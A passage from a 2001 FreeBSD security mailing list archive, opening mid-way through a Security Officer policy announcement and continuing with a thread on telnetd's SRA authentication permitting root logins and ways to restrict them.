branch from the 3.x branch, and the increasing age of userland library infrastructure in the 3.x branch. Details on unresolved vulnerabilities in the 3.x branch may be found later in this document. FreeBSD Branch Support Status - ----------------------------- Branch/Release Support Status -------------- -------------- 3.5.1-RELEASE | 3.5-STABLE | Support for remotely exploitable vulnerabilities. 4.3-STABLE | Support for all local and remote security 4.2-RELEASE | vulnerabilities. 4.3-RELEASE | 5.0-CURRENT | This development branch is not yet supported by | the Security Officer Team Recommendation to Users of the FreeBSD 3.x Branch - ------------------------------------------------- The FreeBSD Security Officer recommends that all systems currently running a version of FreeBSD 3.x be upgraded to 4.3-RELEASE or higher. Use of FreeBSD 3.5.1-RELEASE or FreeBSD 3.5-STABLE as a sealed-box network appliance without untrusted local user access will continue to be supported until at least the release of FreeBSD 5.0-RELEASE. This change in policy will allow the Security Officer Team to devote greater energy to addressing in a timely manner any security issues that may evolve on the 4.x branch, as well as to provide more support to the FreeBSD developer community to improve development practices. Outstanding Local Vulnerabilities in the 3.x Branch - --------------------------------------------------- Currently, FreeBSD Security Advisory SA-00:68, ``ncurses allows local privilege escalation,'' is unresolved in the 3.x branch, as noted in that advisory at time of release. Upgrading the necessary libraries in the 3.x branch would require introducing binary incompatibilities in 3.5.1-RELEASE systems comparable to an upgrade to the 4.x branch. Such disruption is against the policy of FreeBSD regarding ``-STABLE'' branches, and would cause significant disruption to users of that branch for whom local security vulnerabilities may not be of concern. As the code in question is more than 5 years old, and substantially different from the corresponding code in the 4.x branch, developing an equivalent fix has proven very difficult. It may be feasible for individual installations to manually upgrade their ncurses libraries to a non-vulnerable version, but this is not a strategy supported by the FreeBSD Security Officer. As an interim strategy prior to upgrading to FreeBSD 4.3-RELEASE or later, see the workarounds contained in the advisory referenced above. 2) INTRODUCTION OF THE RELENG_4_3 SECURITY BRANCH ---------------------------------------------- As of FreeBSD 4.3-RELEASE, the security officer will be providing support for a new CVS branch consisting of 4.3-RELEASE plus all released security patches from FreeBSD Security Advisories. This branch carries the CVS branch tag of ``RELENG_4_3'', and can be tracked using the usual source distribution methods such as cvsup using this branch tag. In contrast to 4.3-STABLE (``RELENG_4''), which carries security updates as well as general bugfixes and feature enhancements, the RELENG_4_3 release branch will carry ONLY security fixes: it is intended for users of FreeBSD who do not wish to track the full 4.3-STABLE branch but who wish to keep their system up-to-date with security fixes in a semi-automated manner (i.e. without applying patches by hand). This practise of using a release branch to hold security fixes is likely to be continued for future releases of FreeBSD. 3) PROVISION OF BINARY UPDATE PACKAGES FOR SECURITY FIXES ------------------------------------------------------ In response to many user requests, the Security Officer Team will trial the production of binary packages for correcting security vulnerabilities in the FreeBSD base system. At this stage only support for userland (as opposed to kernel) vulnerabilities is planned due to the difficulty of providing a single update for locally-customized kernel versions, although we may be able to provide an updated version of the GENERIC kernel for users who wish to use it to avoid patching and recompiling their own GENERIC kernel from source. The correct operation of binary patches relies heavily on a known common base to which the update is applied. Therefore binary patches will only be supported for users of FreeBSD 4.3-RELEASE on the i386. Users of older supported releases of FreeBSD, users of FreeBSD 4.3-STABLE, or users who choose to follow the RELENG_4_3 branch (described above) are expected to use traditional methods of applying security fixes to their FreeBSD installations, such as applying patches by hand, or using cvsup to update the source collection. For questions regarding the matters discussed in this announcement, please contact the FreeBSD Security Officer . -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.5 (FreeBSD) Comment: For info see http://www.gnupg.org iQCVAwUBOvu8S1UuHi5z0oilAQFvvgQAggyNd7n/f7QHnIt8/lW4GSN4bKuVnH9L GrwZ55bg0SOaTO6NEFu6Yapd5+Rd+5mAl3qN1hhzLrwbdizA7z3W8DSBiDTEViZM nUKZ1JZOkbEuqf0nEfeLXBvvkRFMywQwsdjjb8vJiM+d13iyW1I8+FPMRz0BnuJX piMSK1g/KkU= =K33O -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 11 3:24:18 2001 Delivered-To: freebsd-security@freebsd.org Received: from public.guangzhou.gd.cn (mail2-smtp.guangzhou.gd.cn [202.105.65.222]) by hub.freebsd.org (Postfix) with SMTP id 8EB2E37B43C for ; Fri, 11 May 2001 03:24:13 -0700 (PDT) (envelope-from huacheng@public.guangzhou.gd.cn) Received: from rep1([61.140.208.60]) by public.guangzhou.gd.cn(JetMail 2.5.3.0) with SMTP id jm23afbcba9; Fri, 11 May 2001 10:22:36 -0000 Message-ID: <011201c0da04$823660a0$5801a8c0@suntop.com> From: "edwin chan" To: "Mike Silbersack" Cc: References: Subject: Re: FreeBSD 4.3 RELEASE and -STABLE allows telnet root logins? Date: Fri, 11 May 2001 18:24:04 +0800 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: base64 X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.2615.200 X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2615.200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org c29ycnksIGJlY2F1c2UgSSBub3Qgc3VyZSBpZiBtYWlsIGlzIHNlbmQgb3V0ICBvciByZWNlaXZl ZCBieSBjb3JyZWN0bHksIEkgdXNlIG91ciBuZXcgZS1tYWlsIHNlcnZlciBzZW5kIG1haWwgdG8g dGhpcyBuZXdzZ3JvdXAgYnV0IHJlY2VpdmVkIHdhcm5pbmcgYWJvdXQgb3VyIG1haWwgc2VydmVy IGhhdmUgbm90IGEgcHRyIHBvaW50LiBJdCdzIHZlcnkgZGlmZmljdWx0IHRvIGdvdCBhIHB0ciBw b2ludCBpbiBjaGluYS4gc29ycnkuDQoNCg0KIA0KLS0tLS0gT3JpZ2luYWwgTWVzc2FnZSAtLS0t LSANCkZyb206IE1pa2UgU2lsYmVyc2FjayA8c2lsYnlAc2lsYnkuY29tPg0KVG86IGVkd2luIGNo YW4gPGh1YWNoZW5nQHB1YmxpYy5ndWFuZ3pob3UuZ2QuY24+DQpDYzogPGZyZWVic2Qtc2VjdXJp dHlARnJlZUJTRC5vcmc+DQpTZW50OiBGcmlkYXksIE1heSAxMSwgMjAwMSA1OjU3IFBNDQpTdWJq ZWN0OiBSZTogRnJlZUJTRCA0LjMgUkVMRUFTRSBhbmQgLVNUQUJMRSBhbGxvd3MgdGVsbmV0IHJv b3QgbG9naW5zPw0KDQoNCj4gDQo+IE9uIEZyaSwgMTEgTWF5IDIwMDEsIGVkd2luIGNoYW4gd3Jv dGU6DQo+IA0KPiA+IEkgaGF2ZSB0aGUgc2FtZSBxdWVzdGlvbiwgSSBzZWFyY2hlZCBtYW55IGRv Y3VtZW50cyBidXQgY2FuJ3QgZm91bmQgYSBhbnN3ZXIgdG9vLg0KPiA+IGhvcGUgc29tZW9uZSBj YW4gaGVscCB1cy4NCj4gPg0KPiA+IGVkd2luIGNoYW4NCj4gDQo+IGh0dHA6Ly93d3ctY3Mtc3R1 ZGVudHMuc3RhbmZvcmQuZWR1L350ancvc3JwLw0KPiANCj4gTm90ZSB0aGF0IGluIGFza2luZyB0 aGlzIGZpdmUgdGltZXMsIHlvdSByZWFjaGVkIHlvdXIgcXVlc3Rpb24gcXVvdGEgZm9yDQo+IHRo ZSBuZXh0IHR3byB3ZWVrcy4gIFBsZWFzZSB3YWl0IHRoYXQgbG9uZyBiZWZvcmUgYXNraW5nIGFu eSBtb3JlDQo+IHF1ZXN0aW9ucyBvbiB0aGlzIGxpc3QuDQo+IA0KPiBUaGFua3MsDQo+IA0KPiBN aWtlICJTaWxieSIgU2lsYmVyc2Fjaw0KPiANCj4gDQo+IFRvIFVuc3Vic2NyaWJlOiBzZW5kIG1h aWwgdG8gbWFqb3Jkb21vQEZyZWVCU0Qub3JnDQo+IHdpdGggInVuc3Vic2NyaWJlIGZyZWVic2Qt c2VjdXJpdHkiIGluIHRoZSBib2R5IG9mIHRoZSBtZXNzYWdlDQo+IA0K To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 11 3:42:35 2001 Delivered-To: freebsd-security@freebsd.org Received: from eve.framatome.fr (eve.framatome.fr [195.101.50.66]) by hub.freebsd.org (Postfix) with ESMTP id B8E4D37B424 for ; Fri, 11 May 2001 03:42:31 -0700 (PDT) (envelope-from ubc@paris.framatome.fr) Received: from localhost (ubc@localhost) by eve.framatome.fr (8.11.2/8.11.2) with ESMTP id f4BAfB315149; Fri, 11 May 2001 12:41:11 +0200 (CEST) (envelope-from ubc@eve.framatome.fr) Date: Fri, 11 May 2001 12:41:11 +0200 (CEST) From: Claude Buisson To: Mike Silbersack Cc: edwin chan , Subject: Re: FreeBSD 4.3 RELEASE and -STABLE allows telnet root logins? In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, 11 May 2001, Mike Silbersack wrote: > > On Fri, 11 May 2001, edwin chan wrote: > > > I have the same question, I searched many documents but can't found a answer too. > > hope someone can help us. > > > > edwin chan > > http://www-cs-students.stanford.edu/~tjw/srp/ > I don't think so, see: http://www.freebsd.org/cgi/cvsweb.cgi/src/crypto/telnet/libtelnet/sra.c and ftp://net.tamu.edu/pub/security/TAMU/sra.ps.gz Claude Buisson To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 11 4:58: 7 2001 Delivered-To: freebsd-security@freebsd.org Received: from smtp1.sentex.ca (smtp1.sentex.ca [199.212.134.4]) by hub.freebsd.org (Postfix) with ESMTP id 00F9037B422 for ; Fri, 11 May 2001 04:58:01 -0700 (PDT) (envelope-from mike@sentex.net) Received: from chimp (cage.simianscience.com [64.7.134.1]) by smtp1.sentex.ca (8.11.2/8.11.1) with ESMTP id f4BBvoV39938; Fri, 11 May 2001 07:57:51 -0400 (EDT) (envelope-from mike@sentex.net) Message-Id: <4.2.2.20010511075525.05d665b0@192.168.0.12> X-Sender: mdtancsa@192.168.0.12 X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.2 Date: Fri, 11 May 2001 07:57:49 -0400 To: Jussi Jaurola From: Mike Tancsa Subject: Re: preventing direct root login on telnetd Cc: security@FreeBSD.ORG In-Reply-To: References: <4.2.2.20010511000303.036916f8@192.168.0.12> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 08:57 AM 5/11/2001 +0300, Jussi Jaurola wrote: >Use /etc/hosts.allow. But I think that telnet protocol is so crappy that >use ssh instead? The machine is for customer access. I cannot force them to use ssh all the time so must keep telnet open as an option. How can you use /etc/hosts.allow which wraps the service to prevent it from being used from a certain IP/host/network. I dont see how you can use it to prevent a certain user. ---Mike -------------------------------------------------------------------- Mike Tancsa, tel +1 519 651 3400 Network Administration, mike@sentex.net Sentex Communications www.sentex.net Cambridge, Ontario Canada www.sentex.net/mike To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 11 5: 0: 4 2001 Delivered-To: freebsd-security@freebsd.org Received: from smtp1.sentex.ca (smtp1.sentex.ca [199.212.134.4]) by hub.freebsd.org (Postfix) with ESMTP id 0A74F37B43E for ; Fri, 11 May 2001 05:00:00 -0700 (PDT) (envelope-from mike@sentex.net) Received: from chimp (cage.simianscience.com [64.7.134.1]) by smtp1.sentex.ca (8.11.2/8.11.1) with ESMTP id f4BBxuV40126; Fri, 11 May 2001 07:59:57 -0400 (EDT) (envelope-from mike@sentex.net) Message-Id: <4.2.2.20010511075808.023ee200@192.168.0.12> X-Sender: mdtancsa@192.168.0.12 X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.2 Date: Fri, 11 May 2001 07:59:55 -0400 To: Gabor Zahemszky , freebsd-security@freebsd.org From: Mike Tancsa Subject: Re: preventing direct root login on telnetd In-Reply-To: <20010511071947.C264@zg.CoDe.hu> References: <4.2.2.20010511000303.036916f8@192.168.0.12> <4.2.2.20010511000303.036916f8@192.168.0.12> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 07:19 AM 5/11/2001 +0000, Gabor Zahemszky wrote: >On Fri, May 11, 2001 at 12:09:09AM -0400, Mike Tancsa wrote: > > > > Is there a way to prevent root from logging in directly on STABLE via > telnet ? > >Direct root logins are enabled/disabled via /etc/ttys, aren't it? The new telnetd seems to blow by that. >Or maybe via the /etc/login.access file. man login.access >Btw. Don't use telnet, and never login as root. Use `su' instead. Yes, I dont ever use it but customers do to this particular machine. I will take a look at login.access. Do you know if it works, or if telnetd now ignores that as well ? -------------------------------------------------------------------- Mike Tancsa, tel +1 519 651 3400 Network Administration, mike@sentex.net Sentex Communications www.sentex.net Cambridge, Ontario Canada www.sentex.net/mike To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 11 5: 1:23 2001 Delivered-To: freebsd-security@freebsd.org Received: from gobbe.net (gobbe.net [212.83.113.102]) by hub.freebsd.org (Postfix) with ESMTP id BE05537B423 for ; Fri, 11 May 2001 05:01:20 -0700 (PDT) (envelope-from gobbe@gobbe.net) Received: from localhost (gobbe@localhost) by gobbe.net (8.9.3/8.9.3) with ESMTP id OAA30917; Fri, 11 May 2001 14:58:02 +0300 (EEST) (envelope-from gobbe@gobbe.net) Date: Fri, 11 May 2001 14:58:01 +0300 (EEST) From: Jussi Jaurola To: Mike Tancsa Cc: security@FreeBSD.ORG Subject: Re: preventing direct root login on telnetd In-Reply-To: <4.2.2.20010511075525.05d665b0@192.168.0.12> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Sorry, i was wrong. /etc/login.access is the right file, use that (man login.access can help you a little bit). -- Jussi P. Jaurola Network Security Engineer gobbe@gobbe.net Netello Systems, Ltd. http://gobbe.net +358 50 566 9183 On Fri, 11 May 2001, Mike Tancsa wrote: > At 08:57 AM 5/11/2001 +0300, Jussi Jaurola wrote: > >Use /etc/hosts.allow. But I think that telnet protocol is so crappy that > >use ssh instead? > > > The machine is for customer access. I cannot force them to use ssh all the > time so must keep telnet open as an option. How can you use > /etc/hosts.allow which wraps the service to prevent it from being used from > a certain IP/host/network. I dont see how you can use it to prevent a > certain user. > > ---Mike > -------------------------------------------------------------------- > Mike Tancsa, tel +1 519 651 3400 > Network Administration, mike@sentex.net > Sentex Communications www.sentex.net > Cambridge, Ontario Canada www.sentex.net/mike > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 11 7:43:53 2001 Delivered-To: freebsd-security@freebsd.org Received: from fledge.watson.org (fledge.watson.org [204.156.12.50]) by hub.freebsd.org (Postfix) with ESMTP id 7096437B43E for ; Fri, 11 May 2001 07:43:46 -0700 (PDT) (envelope-from robert@fledge.watson.org) Received: from fledge.watson.org (robert@fledge.pr.watson.org [192.0.2.3]) by fledge.watson.org (8.11.3/8.11.3) with SMTP id f4BEhbf23811; Fri, 11 May 2001 10:43:37 -0400 (EDT) (envelope-from robert@fledge.watson.org) Date: Fri, 11 May 2001 10:43:36 -0400 (EDT) From: Robert Watson X-Sender: robert@fledge.watson.org To: Daniel Hauer Cc: freebsd-security@freebsd.org Subject: Re: FreeBSD 4.3 RELEASE and -STABLE allows telnet root logins? In-Reply-To: <3AFB369D.5574182A@enter.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org This is a known problem and we are working to resolve this ASAP. Robert N M Watson FreeBSD Core Team, TrustedBSD Project robert@fledge.watson.org NAI Labs, Safeport Network Services On Thu, 10 May 2001, Daniel Hauer wrote: > Hello all, > After installing 4.3 release on one machine and upgrading 2 other > machines to -STABLE, I noticed there is a new mechanism used in telnetd, > namely this "SRA" authentication mechanism. While convienient, (you > don't have to type your username) I found something VERY disturbing: If > you are at a root prompt on any other BSD > based machine, you can just telnet to the 4.3 machines, and login right > in with the root username and password! This only apparently occurs from > a BSD based machine, as Myself and a co-worker tried it from 2 different > distribution Linux boxes, and we could not login as root. None of the > switches for telnetd in the inetd.conf worked to our satisfaction, and > after reading the sources, we recompiled telnetd with AUTHENTICATION=NO > to disable this behavior. What is this "SRA authentication" ? And why is > telnetd's default behavior to allow root logins at all? I realize that > any self respecting sysadmin will either use ipfirewall, ipfilter, or > good old inetd's hosts.allow file to limit telnet logins anyway, but the > question still remains.... Why? Wouldn't this SRA with a "no root" login > be a better idea? > > -- > Regards, > Daniel Hauer > Network Administration > http://www.enter.net "The Road To The Internet Starts There!" > *************************************************************************** > Windoze is for GAMES, UNIX is for the rest of us. > UNIX is like the sights on a loaded gun. If you aim the gun > at your foot and pull the trigger, it is the basic function of > UNIX to accurately deliver the bullet from the gun to the > target. In this case, it's your foot. > *************************************************************************** > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 11 7:59:38 2001 Delivered-To: freebsd-security@freebsd.org Received: from silby.com (adam042-060.resnet.wisc.edu [146.151.42.60]) by hub.freebsd.org (Postfix) with ESMTP id 72F0A37B423 for ; Fri, 11 May 2001 07:59:34 -0700 (PDT) (envelope-from silby@silby.com) Received: (qmail 46701 invoked by uid 1000); 11 May 2001 14:59:32 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 11 May 2001 14:59:32 -0000 Date: Fri, 11 May 2001 09:59:32 -0500 (CDT) From: Mike Silbersack To: Claude Buisson Cc: edwin chan , Subject: Re: FreeBSD 4.3 RELEASE and -STABLE allows telnet root logins? In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, 11 May 2001, Claude Buisson wrote: > On Fri, 11 May 2001, Mike Silbersack wrote: > > > http://www-cs-students.stanford.edu/~tjw/srp/ > > I don't think so, see: > > http://www.freebsd.org/cgi/cvsweb.cgi/src/crypto/telnet/libtelnet/sra.c > > and > > ftp://net.tamu.edu/pub/security/TAMU/sra.ps.gz > > > Claude Buisson Urk, thanks for the pointer. My mind jumped to the nearest acronym it could think of, rather than reading the one presented to me. Mike "Silby" Silbersack To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 11 8:29: 3 2001 Delivered-To: freebsd-security@freebsd.org Received: from mdma.playboy.com (mdma.playboy.com [216.163.140.20]) by hub.freebsd.org (Postfix) with ESMTP id B076D37B424 for ; Fri, 11 May 2001 08:29:00 -0700 (PDT) (envelope-from jamie@playboy.com) Received: by mdma.playboy.com (Postfix, from userid 100) id F093F12796; Fri, 11 May 2001 10:28:49 -0500 (CDT) Date: Fri, 11 May 2001 10:28:49 -0500 From: jamie rishaw To: edwin chan Cc: freebsd-security@freebsd.org Subject: Re: I expect a answer about SRA Message-ID: <20010511102849.A9587@playboy.com> References: <004b01c0d9e4$a3bb35e0$5801a8c0@suntop.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <004b01c0d9e4$a3bb35e0$5801a8c0@suntop.com>; from huacheng@public.guangzhou.gd.cn on Fri, May 11, 2001 at 02:35:58PM +0800 X-No-Archive: yes Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org If you "Expect", then you best be buying commercial support. This list is not for one to make demands .. On Fri, May 11, 2001 at 02:35:58PM +0800, edwin chan wrote: > I expect a answer about SRA too. -- jamie rishaw sr. wan/unix engineer/ninja // playboy enterprises inc. opinions stated are mine, and are not necessarily those of the bunny. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 11 8:36: 8 2001 Delivered-To: freebsd-security@freebsd.org Received: from mohegan.mohawk.net (mohegan.mohawk.net [63.66.68.21]) by hub.freebsd.org (Postfix) with ESMTP id F2DAF37B61A for ; Fri, 11 May 2001 08:36:02 -0700 (PDT) (envelope-from rjh@mohawk.net) Received: from mohegan.mohawk.net (mohegan.mohawk.net [63.66.68.21]) by mohegan.mohawk.net (8.11.3/8.11.3) with ESMTP id f4BFa0L15527; Fri, 11 May 2001 11:36:00 -0400 (EDT) Date: Fri, 11 May 2001 11:36:00 -0400 (EDT) From: Ralph Huntington To: jamie rishaw Cc: edwin chan , freebsd-security@FreeBSD.ORG Subject: Re: I expect a answer about SRA In-Reply-To: <20010511102849.A9587@playboy.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I suspect that our friend from China is more vocabulary limited than he is demanding. My guess is that he meant something like "am hoping for" and "expect" was the closest he could come to it. I could be wrong, but that's my guess. -=r=- On Fri, 11 May 2001, jamie rishaw wrote: > If you "Expect", then you best be buying commercial support. > > This list is not for one to make demands .. > > On Fri, May 11, 2001 at 02:35:58PM +0800, edwin chan wrote: > > I expect a answer about SRA too. > > -- > jamie rishaw > sr. wan/unix engineer/ninja // playboy enterprises inc. > opinions stated are mine, and are not necessarily those of the bunny. > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 11 8:55:55 2001 Delivered-To: freebsd-security@freebsd.org Received: from sentry.granch.com (sentry.granch.com [212.109.197.55]) by hub.freebsd.org (Postfix) with ESMTP id 145AA37B423 for ; Fri, 11 May 2001 08:55:51 -0700 (PDT) (envelope-from shelton@sentry.granch.ru) Received: from sentry.granch.com (localhost [127.0.0.1]) by sentry.granch.com (8.11.3/8.11.3) with SMTP id f4BFtHD11430; Fri, 11 May 2001 22:55:21 +0700 (NOVST) (envelope-from shelton@sentry.granch.ru) Content-Type: text/plain; charset="koi8-r" From: "Rashid N. Achilov" Reply-To: achilov@granch.ru Organization: Granch Ltd. To: Mike Silbersack , edwin chan Subject: Re: FreeBSD 4.3 RELEASE and -STABLE allows telnet root logins? Date: Fri, 11 May 2001 22:55:17 +0700 X-Mailer: KMail [version 1.2] Cc: References: In-Reply-To: MIME-Version: 1.0 Message-Id: <0105112255170C.06061@sentry.granch.com> Content-Transfer-Encoding: 8bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Friday 11 May 2001 16:57, Mike Silbersack wrote: > On Fri, 11 May 2001, edwin chan wrote: > > I have the same question, I searched many documents but can't found a > > answer too. hope someone can help us. > > > > edwin chan > > http://www-cs-students.stanford.edu/~tjw/srp/ > I have just read this. They asserted, that SRA mechanism is better that SSH? Is there ok, you think? (I wouldn't have noticed these news, if I haven't read freebsd-security - I have disabled telnet for ages :-) ) -- With Best Regards. Rashid N. Achilov (RNA1-RIPE), Web: http://granch.ru/~shelton Granch Ltd. system administrator, e-mail: achilov@granch.ru PGP: 83 CD E2 A7 37 4A D5 81 D6 D6 52 BF C9 2F 85 AF 97 BE CB 0A To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 11 9:13: 3 2001 Delivered-To: freebsd-security@freebsd.org Received: from public.guangzhou.gd.cn (mail1-smtp.guangzhou.gd.cn [202.105.65.221]) by hub.freebsd.org (Postfix) with SMTP id 425BB37B423 for ; Fri, 11 May 2001 09:12:44 -0700 (PDT) (envelope-from huacheng@public.guangzhou.gd.cn) Received: from slack([61.140.83.14]) by public.guangzhou.gd.cn(JetMail 2.5.3.0) with SMTP id jm1a3afc0f3a; Fri, 11 May 2001 16:11:11 -0000 Message-ID: <007401c0da35$3b1dbb60$9201a8c0@home.net> From: "edwin chan" To: "Ralph Huntington" , "jamie rishaw" Cc: References: Subject: Re: I expect a answer about SRA Date: Sat, 12 May 2001 00:12:46 +0800 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.2615.200 X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2615.200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org yes, I have limited vocabulary than I demanded, limited than you think. I have a chinese-english-online-dictionary on my computer. ready for translate chinese word to english when I write/read mail. LOL now I know something about SRA, thinks everybody. edwin chan ----- Original Message ----- From: Ralph Huntington To: jamie rishaw Cc: edwin chan ; Sent: Friday, May 11, 2001 11:36 PM Subject: Re: I expect a answer about SRA > I suspect that our friend from China is more vocabulary limited than he is > demanding. My guess is that he meant something like "am hoping for" and > "expect" was the closest he could come to it. I could be wrong, but that's > my guess. -=r=- > > On Fri, 11 May 2001, jamie rishaw wrote: > > > If you "Expect", then you best be buying commercial support. > > > > This list is not for one to make demands .. > > > > On Fri, May 11, 2001 at 02:35:58PM +0800, edwin chan wrote: > > > I expect a answer about SRA too. > > > > -- > > jamie rishaw > > sr. wan/unix engineer/ninja // playboy enterprises inc. > > opinions stated are mine, and are not necessarily those of the bunny. > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > > > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 11 9:18: 9 2001 Delivered-To: freebsd-security@freebsd.org Received: from public.guangzhou.gd.cn (mail1-smtp.guangzhou.gd.cn [202.105.65.221]) by hub.freebsd.org (Postfix) with SMTP id A85FC37B424 for ; Fri, 11 May 2001 09:15:55 -0700 (PDT) (envelope-from /aimcque/jmail.rcv/4/jm1a3afc0f3a@public.guangzhou.gd.cn) Received: from slack([61.140.83.14]) by public.guangzhou.gd.cn(JetMail 2.5.3.0) with SMTP id jm1a3afc0f3a; Fri, 11 May 2001 16:11:11 -0000 Message-ID: <007401c0da35$3b1dbb60$9201a8c0@home.net> From: "edwin chan" To: "Ralph Huntington" , "jamie rishaw" Cc: References: Subject: Re: I expect a answer about SRA Date: Sat, 12 May 2001 00:12:46 +0800 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.2615.200 X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2615.200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org yes, I have limited vocabulary than I demanded, limited than you think. I have a chinese-english-online-dictionary on my computer. ready for translate chinese word to english when I write/read mail. LOL now I know something about SRA, thinks everybody. edwin chan ----- Original Message ----- From: Ralph Huntington To: jamie rishaw Cc: edwin chan ; Sent: Friday, May 11, 2001 11:36 PM Subject: Re: I expect a answer about SRA > I suspect that our friend from China is more vocabulary limited than he is > demanding. My guess is that he meant something like "am hoping for" and > "expect" was the closest he could come to it. I could be wrong, but that's > my guess. -=r=- > > On Fri, 11 May 2001, jamie rishaw wrote: > > > If you "Expect", then you best be buying commercial support. > > > > This list is not for one to make demands .. > > > > On Fri, May 11, 2001 at 02:35:58PM +0800, edwin chan wrote: > > > I expect a answer about SRA too. > > > > -- > > jamie rishaw > > sr. wan/unix engineer/ninja // playboy enterprises inc. > > opinions stated are mine, and are not necessarily those of the bunny. > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > > > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 11 9:23:40 2001 Delivered-To: freebsd-security@freebsd.org Received: from peace.mahoroba.org (peace.calm.imasy.or.jp [202.227.26.34]) by hub.freebsd.org (Postfix) with ESMTP id 3CD6A37B424 for ; Fri, 11 May 2001 09:23:36 -0700 (PDT) (envelope-from ume@mahoroba.org) Received: from localhost (IDENT:bFjGTDkSdR5SOvBgb2w9lqyxWa9xY2ZjOjPoZBO6tei/6Apea6XQyS8aHyHJIvq9@localhost [::1]) (authenticated as ume with CRAM-MD5) by peace.mahoroba.org (8.11.3/8.11.3/peace) with ESMTP/inet6 id f4BGN0180211; Sat, 12 May 2001 01:23:00 +0900 (JST) (envelope-from ume@mahoroba.org) Date: Sat, 12 May 2001 01:22:56 +0900 (JST) Message-Id: <20010512.012256.74710954.ume@mahoroba.org> To: mike@sentex.net Cc: ZGabor@CoDe.hu, freebsd-security@freebsd.org Subject: Re: preventing direct root login on telnetd From: Hajimu UMEMOTO In-Reply-To: <4.2.2.20010511075808.023ee200@192.168.0.12> References: <4.2.2.20010511000303.036916f8@192.168.0.12> <20010511071947.C264@zg.CoDe.hu> <4.2.2.20010511075808.023ee200@192.168.0.12> X-Mailer: xcite1.38> Mew version 1.95b119 on Emacs 20.7 / Mule 4.0 =?iso-2022-jp?B?KBskQjJWMWMbKEIp?= X-PGP-Public-Key: http://www.imasy.org/~ume/publickey.asc X-PGP-Fingerprint: 6B 0C 53 FC 5D D0 37 91 05 D0 B3 EF 36 9B 6A BC 